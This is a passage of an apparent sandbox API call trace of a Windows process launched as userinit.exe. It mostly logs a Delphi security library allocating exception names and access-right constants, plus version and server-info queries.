[0190.570] SysReAllocStringLen (in: pbstr=0x293f2a0*=0x0, psz="EJwsclStreamSizeException", len=0x19 | out: pbstr=0x293f2a0*="EJwsclStreamSizeException") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f288*=0x0, psz="EJwsclStreamException", len=0x15 | out: pbstr=0x293f288*="EJwsclStreamException") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f270*=0x0, psz="EJwsclNoSuchLogonSession", len=0x18 | out: pbstr=0x293f270*="EJwsclNoSuchLogonSession") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f258*=0x0, psz="EJwsclInvalidFlagsException", len=0x1b | out: pbstr=0x293f258*="EJwsclInvalidFlagsException") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f240*=0x0, psz="EJwsclProcessNotFound", len=0x15 | out: pbstr=0x293f240*="EJwsclProcessNotFound") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f228*=0x0, psz="EJwsclInvalidParameterException", len=0x1f | out: pbstr=0x293f228*="EJwsclInvalidParameterException") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f210*=0x0, psz="EJwsclInvalidPathException", len=0x1a | out: pbstr=0x293f210*="EJwsclInvalidPathException") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f1f8*=0x0, psz="EJwsclInvalidSecurityDescriptor", len=0x1f | out: pbstr=0x293f1f8*="EJwsclInvalidSecurityDescriptor") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f1e0*=0x0, psz="EJwsclInvalidRevision", len=0x15 | out: pbstr=0x293f1e0*="EJwsclInvalidRevision") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f1c8*=0x0, psz="EJwsclInvalidAceMismatch", len=0x18 | out: pbstr=0x293f1c8*="EJwsclInvalidAceMismatch") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f1b0*=0x0, psz="EJwsclRevisionMismatchException", len=0x1f | out: pbstr=0x293f1b0*="EJwsclRevisionMismatchException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293f198*=0x0, psz="EJwsclInvalidACEException", len=0x19 | out: pbstr=0x293f198*="EJwsclInvalidACEException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293f180*=0x0, psz="EJwsclReadOnlyPropertyException", len=0x1f | out: pbstr=0x293f180*="EJwsclReadOnlyPropertyException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293f168*=0x0, psz="EJwsclDuplicateListEntryException", len=0x21 | out: pbstr=0x293f168*="EJwsclDuplicateListEntryException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293f150*=0x0, psz="EJwsclIndexOutOfBoundsException", len=0x1f | out: pbstr=0x293f150*="EJwsclIndexOutOfBoundsException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293f138*=0x0, psz="EJwsclInvalidSidAuthorityValue", len=0x1e | out: pbstr=0x293f138*="EJwsclInvalidSidAuthorityValue") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293f120*=0x0, psz="EJwsclInvalidKnownSIDException", len=0x1e | out: pbstr=0x293f120*="EJwsclInvalidKnownSIDException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293f108*=0x0, psz="EJwsclInvalidComputer", len=0x15 | out: pbstr=0x293f108*="EJwsclInvalidComputer") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293f0f0*=0x0, psz="EJwsclInvalidGroupSIDException", len=0x1e | out: pbstr=0x293f0f0*="EJwsclInvalidGroupSIDException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293f0d8*=0x0, psz="EJwsclInvalidOwnerSIDException", len=0x1e | out: pbstr=0x293f0d8*="EJwsclInvalidOwnerSIDException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293f0c0*=0x0, psz="EJwsclInvalidSIDException", len=0x19 | out: pbstr=0x293f0c0*="EJwsclInvalidSIDException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293f0a8*=0x0, psz="EJwsclInvalidSecurityListException", len=0x22 | out: pbstr=0x293f0a8*="EJwsclInvalidSecurityListException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293f090*=0x0, psz="EJwsclInvalidMandatoryLevelException", len=0x24 | out: pbstr=0x293f090*="EJwsclInvalidMandatoryLevelException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293f078*=0x0, psz="EJwsclEmptyACLException", len=0x17 | out: pbstr=0x293f078*="EJwsclEmptyACLException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293f060*=0x0, psz="EJwsclNILParameterException", len=0x1b | out: pbstr=0x293f060*="EJwsclNILParameterException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293f048*=0x0, psz="EJwsclInheritanceSourceNotSupportedException", len=0x2c | out: pbstr=0x293f048*="EJwsclInheritanceSourceNotSupportedException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293f030*=0x0, psz="EJwsclInvalidObjectArrayException", len=0x21 | out: pbstr=0x293f030*="EJwsclInvalidObjectArrayException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293f018*=0x0, psz="EJwsclProcessIdNotAvailable", len=0x1b | out: pbstr=0x293f018*="EJwsclProcessIdNotAvailable") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293f000*=0x0, psz="EJwsclWinCallFailedException", len=0x1c | out: pbstr=0x293f000*="EJwsclWinCallFailedException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293efe8*=0x0, psz="EJwsclUnsupportedWindowsVersionException", len=0x28 | out: pbstr=0x293efe8*="EJwsclUnsupportedWindowsVersionException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293efd0*=0x0, psz="EJwsclNotImplementedException", len=0x1d | out: pbstr=0x293efd0*="EJwsclNotImplementedException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293efb8*=0x0, psz="EJwsclAccessTypeException", len=0x19 | out: pbstr=0x293efb8*="EJwsclAccessTypeException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293efa0*=0x0, psz="EJwsclAdjustPrivilegeException", len=0x1e | out: pbstr=0x293efa0*="EJwsclAdjustPrivilegeException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293ef88*=0x0, psz="EJwsclPrivilegeCheckException", len=0x1d | out: pbstr=0x293ef88*="EJwsclPrivilegeCheckException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293ef70*=0x0, psz="EJwsclPrivilegeNotFoundException", len=0x20 | out: pbstr=0x293ef70*="EJwsclPrivilegeNotFoundException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293ef58*=0x0, psz="EJwsclInvalidIndexPrivilegeException", len=0x24 | out: pbstr=0x293ef58*="EJwsclInvalidIndexPrivilegeException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293ef40*=0x0, psz="EJwsclPrivilegeException", len=0x18 | out: pbstr=0x293ef40*="EJwsclPrivilegeException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293ef28*=0x0, psz="EJwsclNotEnoughMemory", len=0x15 | out: pbstr=0x293ef28*="EJwsclNotEnoughMemory") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293ef10*=0x0, psz="EJwsclInvalidTokenHandle", len=0x18 | out: pbstr=0x293ef10*="EJwsclInvalidTokenHandle") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293eef8*=0x0, psz="EJwsclNoThreadTokenAvailable", len=0x1c | out: pbstr=0x293eef8*="EJwsclNoThreadTokenAvailable") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293eee0*=0x0, psz="EJwsclDuplicateTokenException", len=0x1d | out: pbstr=0x293eee0*="EJwsclDuplicateTokenException") returned 1
[0190.571] SysReAllocStringLen (in: pbstr=0x293eec8*=0x0, psz="EJwsclInvalidOwnerException", len=0x1b | out: pbstr=0x293eec8*="EJwsclInvalidOwnerException") returned 1
[0190.572] SysReAllocStringLen (in: pbstr=0x293eeb0*=0x0, psz="EJwsclInvalidPrimaryToken", len=0x19 | out: pbstr=0x293eeb0*="EJwsclInvalidPrimaryToken") returned 1
[0190.572] SysReAllocStringLen (in: pbstr=0x293ee98*=0x0, psz="EJwsclTokenPrimaryException", len=0x1b | out: pbstr=0x293ee98*="EJwsclTokenPrimaryException") returned 1
[0190.572] SysReAllocStringLen (in: pbstr=0x293ee80*=0x0, psz="EJwsclTokenImpersonationException", len=0x21 | out: pbstr=0x293ee80*="EJwsclTokenImpersonationException") returned 1
[0190.572] SysReAllocStringLen (in: pbstr=0x293ee68*=0x0, psz="EJwsclTokenInformationException", len=0x1f | out: pbstr=0x293ee68*="EJwsclTokenInformationException") returned 1
[0190.572] SysReAllocStringLen (in: pbstr=0x293ee50*=0x0, psz="EJwsclSharedTokenException", len=0x1a | out: pbstr=0x293ee50*="EJwsclSharedTokenException") returned 1
[0190.572] SysReAllocStringLen (in: pbstr=0x293ee38*=0x0, psz="EJwsclOpenProcessTokenException", len=0x1f | out: pbstr=0x293ee38*="EJwsclOpenProcessTokenException") returned 1
[0190.572] SysReAllocStringLen (in: pbstr=0x293ee20*=0x0, psz="EJwsclOpenThreadTokenException", len=0x1e | out: pbstr=0x293ee20*="EJwsclOpenThreadTokenException") returned 1
[0190.572] SysReAllocStringLen (in: pbstr=0x293ee08*=0x0, psz="EJwsclSecurityException", len=0x17 | out: pbstr=0x293ee08*="EJwsclSecurityException") returned 1
[0190.572] SysReAllocStringLen (in: pbstr=0x293edf0*=0x0, psz="Exception", len=0x9 | out: pbstr=0x293edf0*="Exception") returned 1
[0190.572] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0190.572] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0190.572] GetVersionExA (in: lpVersionInformation=0x8f0c4*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x76a6ea43, dwMinorVersion=0x140000, dwBuildNumber=0x0, dwPlatformId=0x10, szCSDVersion="\xec\xf0\x08") | out: lpVersionInformation=0x8f0c4*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0190.572] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x0
[0190.572] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x73b10000
[0190.580] GetProcAddress (hModule=0x73b10000, lpProcName="NetServerGetInfo") returned 0x74f13cfa
[0190.580] NetServerGetInfo (in: servername="", level=0x65, bufptr=0x8f148 | out: bufptr=0x8f148) returned 0x0
[0190.584] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x73b10000
[0190.584] GetProcAddress (hModule=0x73b10000, lpProcName="NetApiBufferFree") returned 0x73b013d2
[0190.585] NetApiBufferFree (Buffer=0x161d00) returned 0x0
[0190.585] SetErrorMode (uMode=0x8000) returned 0x1
[0190.585] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x758f0000
[0190.585] SetErrorMode (uMode=0x1) returned 0x8000
[0190.585] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0190.586] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0190.588] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0190.589] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0190.590] SysReAllocStringLen (in: pbstr=0x293ec40*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x293ec40*="DELETE") returned 1
[0190.590] SysReAllocStringLen (in: pbstr=0x293ec30*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x293ec30*="READ_CONTROL") returned 1
[0190.590] SysReAllocStringLen (in: pbstr=0x293ec20*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x293ec20*="WRITE_OWNER") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293ec10*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x293ec10*="WRITE_DAC") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293ec00*=0x0, psz="FILE_WRITE_ATTRIBUTES", len=0x15 | out: pbstr=0x293ec00*="FILE_WRITE_ATTRIBUTES") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293ebf0*=0x0, psz="FILE_READ_ATTRIBUTES", len=0x14 | out: pbstr=0x293ebf0*="FILE_READ_ATTRIBUTES") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293ebe0*=0x0, psz="FILE_CREATE_PIPE_INSTANCE", len=0x19 | out: pbstr=0x293ebe0*="FILE_CREATE_PIPE_INSTANCE") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293ebd0*=0x0, psz="FILE_WRITE_DATA", len=0xf | out: pbstr=0x293ebd0*="FILE_WRITE_DATA") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293ebc0*=0x0, psz="FILE_READ_DATA", len=0xe | out: pbstr=0x293ebc0*="FILE_READ_DATA") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293ebb0*=0x0, psz="FILE_ALL_ACCESS", len=0xf | out: pbstr=0x293ebb0*="FILE_ALL_ACCESS") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293eba0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x293eba0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293eb90*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x293eb90*="STANDARD_RIGHTS_WRITE") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293eb80*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x293eb80*="STANDARD_RIGHTS_READ") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293eb70*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x293eb70*="STANDARD_RIGHTS_ALL") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293eb50*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x293eb50*="DELETE") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293eb40*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x293eb40*="READ_CONTROL") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293eb30*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x293eb30*="WRITE_OWNER") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293eb20*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x293eb20*="WRITE_DAC") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293eb10*=0x0, psz="TOKEN_ADJUST_SESSIONID", len=0x16 | out: pbstr=0x293eb10*="TOKEN_ADJUST_SESSIONID") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293eb00*=0x0, psz="TOKEN_ADJUST_DEFAULT", len=0x14 | out: pbstr=0x293eb00*="TOKEN_ADJUST_DEFAULT") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293eaf0*=0x0, psz="TOKEN_ADJUST_GROUPS", len=0x13 | out: pbstr=0x293eaf0*="TOKEN_ADJUST_GROUPS") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293eae0*=0x0, psz="TOKEN_ADJUST_PRIVILEGES", len=0x17 | out: pbstr=0x293eae0*="TOKEN_ADJUST_PRIVILEGES") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293ead0*=0x0, psz="TOKEN_QUERY_SOURCE", len=0x12 | out: pbstr=0x293ead0*="TOKEN_QUERY_SOURCE") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293eac0*=0x0, psz="TOKEN_QUERY", len=0xb | out: pbstr=0x293eac0*="TOKEN_QUERY") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293eab0*=0x0, psz="TOKEN_IMPERSONATE", len=0x11 | out: pbstr=0x293eab0*="TOKEN_IMPERSONATE") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293eaa0*=0x0, psz="TOKEN_DUPLICATE", len=0xf | out: pbstr=0x293eaa0*="TOKEN_DUPLICATE") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293ea90*=0x0, psz="TOKEN_ASSIGN_PRIMARY", len=0x14 | out: pbstr=0x293ea90*="TOKEN_ASSIGN_PRIMARY") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293ea80*=0x0, psz="TOKEN_ALL_ACCESS", len=0x10 | out: pbstr=0x293ea80*="TOKEN_ALL_ACCESS") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293ea70*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x293ea70*="STANDARD_RIGHTS_EXECUTE") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293ea60*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x293ea60*="STANDARD_RIGHTS_WRITE") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293ea50*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x293ea50*="STANDARD_RIGHTS_READ") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293ea40*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x293ea40*="STANDARD_RIGHTS_ALL") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293ea30*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x293ea30*="DELETE") returned 1
[0190.591] SysReAllocStringLen (in: pbstr=0x293ea20*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x293ea20*="READ_CONTROL") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293ea10*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x293ea10*="WRITE_OWNER") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293ea00*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x293ea00*="WRITE_DAC") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e9f0*=0x0, psz="TIMER_MODIFY_STATE", len=0x12 | out: pbstr=0x293e9f0*="TIMER_MODIFY_STATE") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e9e0*=0x0, psz="TIMER_QUERY_STATE", len=0x11 | out: pbstr=0x293e9e0*="TIMER_QUERY_STATE") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e9d0*=0x0, psz="TIMER_ALL_ACCESS", len=0x10 | out: pbstr=0x293e9d0*="TIMER_ALL_ACCESS") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e9c0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x293e9c0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e9b0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x293e9b0*="STANDARD_RIGHTS_WRITE") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e9a0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x293e9a0*="STANDARD_RIGHTS_READ") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e990*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x293e990*="STANDARD_RIGHTS_ALL") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e980*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x293e980*="DELETE") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e970*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x293e970*="READ_CONTROL") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e960*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x293e960*="WRITE_OWNER") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e950*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x293e950*="WRITE_DAC") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e940*=0x0, psz="SECTION_EXTEND_SIZE", len=0x13 | out: pbstr=0x293e940*="SECTION_EXTEND_SIZE") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e930*=0x0, psz="FILE_MAP_READ", len=0xd | out: pbstr=0x293e930*="FILE_MAP_READ") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e920*=0x0, psz="FILE_MAP_WRITE", len=0xe | out: pbstr=0x293e920*="FILE_MAP_WRITE") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e910*=0x0, psz="FILE_MAP_COPY", len=0xd | out: pbstr=0x293e910*="FILE_MAP_COPY") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e900*=0x0, psz="FILE_MAP_ALL_ACCESS", len=0x13 | out: pbstr=0x293e900*="FILE_MAP_ALL_ACCESS") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e8f0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x293e8f0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e8e0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x293e8e0*="STANDARD_RIGHTS_WRITE") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e8d0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x293e8d0*="STANDARD_RIGHTS_READ") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e8c0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x293e8c0*="STANDARD_RIGHTS_ALL") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e8b0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x293e8b0*="DELETE") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e8a0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x293e8a0*="READ_CONTROL") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e890*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x293e890*="WRITE_OWNER") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e880*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x293e880*="WRITE_DAC") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e870*=0x0, psz="MUTEX_MODIFY_STATE", len=0x12 | out: pbstr=0x293e870*="MUTEX_MODIFY_STATE") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e860*=0x0, psz="MUTEX_ALL_ACCESS", len=0x10 | out: pbstr=0x293e860*="MUTEX_ALL_ACCESS") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e850*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x293e850*="STANDARD_RIGHTS_EXECUTE") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e840*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x293e840*="STANDARD_RIGHTS_WRITE") returned 1
[0190.592] SysReAllocStringLen (in: pbstr=0x293e830*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x293e830*="STANDARD_RIGHTS_READ") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e820*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x293e820*="STANDARD_RIGHTS_ALL") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e810*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x293e810*="DELETE") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e800*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x293e800*="READ_CONTROL") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e7f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x293e7f0*="WRITE_OWNER") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e7e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x293e7e0*="WRITE_DAC") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e7d0*=0x0, psz="EVENT_MODIFY_STATE", len=0x12 | out: pbstr=0x293e7d0*="EVENT_MODIFY_STATE") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e7c0*=0x0, psz="EVENT_ALL_ACCESS", len=0x10 | out: pbstr=0x293e7c0*="EVENT_ALL_ACCESS") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e7b0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x293e7b0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e7a0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x293e7a0*="STANDARD_RIGHTS_WRITE") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e790*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x293e790*="STANDARD_RIGHTS_READ") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e780*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x293e780*="STANDARD_RIGHTS_ALL") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e770*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x293e770*="DELETE") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e760*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x293e760*="READ_CONTROL") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e750*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x293e750*="WRITE_OWNER") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e740*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x293e740*="WRITE_DAC") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e730*=0x0, psz="SEMAPHORE_MODIFY_STATE", len=0x16 | out: pbstr=0x293e730*="SEMAPHORE_MODIFY_STATE") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e720*=0x0, psz="SEMAPHORE_ALL_ACCESS", len=0x14 | out: pbstr=0x293e720*="SEMAPHORE_ALL_ACCESS") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e710*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x293e710*="STANDARD_RIGHTS_EXECUTE") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e700*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x293e700*="STANDARD_RIGHTS_WRITE") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e6f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x293e6f0*="STANDARD_RIGHTS_READ") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e6e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x293e6e0*="STANDARD_RIGHTS_ALL") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e6d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x293e6d0*="DELETE") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e6c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x293e6c0*="READ_CONTROL") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e6b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x293e6b0*="WRITE_OWNER") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e6a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x293e6a0*="WRITE_DAC") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e690*=0x0, psz="JOB_OBJECT_SET_SECURITY_ATTRIBUTES", len=0x22 | out: pbstr=0x293e690*="JOB_OBJECT_SET_SECURITY_ATTRIBUTES") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e680*=0x0, psz="JOB_OBJECT_TERMINATE", len=0x14 | out: pbstr=0x293e680*="JOB_OBJECT_TERMINATE") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e670*=0x0, psz="JOB_OBJECT_QUERY", len=0x10 | out: pbstr=0x293e670*="JOB_OBJECT_QUERY") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e660*=0x0, psz="JOB_OBJECT_SET_ATTRIBUTES", len=0x19 | out: pbstr=0x293e660*="JOB_OBJECT_SET_ATTRIBUTES") returned 1
[0190.593] SysReAllocStringLen (in: pbstr=0x293e650*=0x0, psz="JOB_OBJECT_ASSIGN_PROCESS", len=0x19 | out: pbstr=0x293e650*="JOB_OBJECT_ASSIGN_PROCESS") returned 1
[0190.594] SysReAllocStringLen (in: pbstr=0x293e640*=0x0, psz="JOB_OBJECT_ALL_ACCESS", len=0x15 | out: pbstr=0x293e640*="JOB_OBJECT_ALL_ACCESS") returned 1
[0190.594] SysReAllocStringLen (in: pbstr=0x293e630*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x293e630*="STANDARD_RIGHTS_EXECUTE") returned 1
